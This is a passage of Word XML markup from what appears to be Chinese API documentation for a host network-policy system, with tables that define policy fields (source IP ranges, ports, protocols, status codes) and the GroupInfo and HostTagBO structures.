              <w:t>srcTags</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67A6030C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66CFC2BE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>访问主机标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="13DEA81E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76065CD3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>srcIpRanges</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D23F499" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="176B8BCB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>访问者</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="114B76F2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FE4314E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>srcAgentSize</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50447632" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D77357A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>访问主机数量</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3E902BCA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="171ECB81" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>srcAgentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1371C013" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DE252D3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>访问自定义主机范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="453C60C3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BECB4A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>srcIpName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02DA72F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11780AA0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>访问主机</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7D3D172C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3858F201" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4748F00C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="542DD479" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5A1F874D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BAEDE6F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>protos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E980E14" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A611996" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>协议</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7FCB03B0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06967FD3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56B275E0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1761035F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>策略状态,0：新建，1：待同步，2：已同步,3:删除</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="73EC9DCB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A596F46" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>updateTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="440E9F7B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0008FD5E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>修改时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3462BEA0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="576E59C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>optUsername</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F75FCAE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C6B8890" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>操作用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0846ABAD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B37D073" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37449AD4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DF482B1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0F817E96" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A34CA7E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayDstIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7648F18D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6767ADC0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>目标IP搜索字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7932B070" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75E2002E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displaySrcIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A2DCDAF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A389ED8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>源IP搜索字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0DC4ED7F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28A7AF13" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayPort</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43F44571" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D18DC37" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口搜索字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7EBB372E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56D7C780" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>switchStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F0D5357" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D430247" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>开关状态，0：关闭，1：打开</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="380CBB9D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F40D44C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>operation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="251D59BA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7208009F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否有操作权限，true：有权限，false：无权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5B864695" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GroupInfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1279"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="3336"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="193652D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94EA615" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6946594E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4ADCF1D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="68C8B15E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5413FEFB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>groupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E29C1F8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43031851" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3EF5C7F9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76494A19" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74AC90F2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B419B76" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>操作系统，1：</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>，2：windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4A0570D9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76056795" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4863ADF3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33150FA1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="29C6E69F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DC71B1C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A67D8B0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CF0B7C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="36F596C0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E8A245F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>parentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24A23CB6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EFFD0AE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>父节点id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="06A52130" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HostTagBO</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1103"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="609199A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7F6F553" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="282E1E30" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C48D149" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="10C3DEB0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CC1C94E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4154A368" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
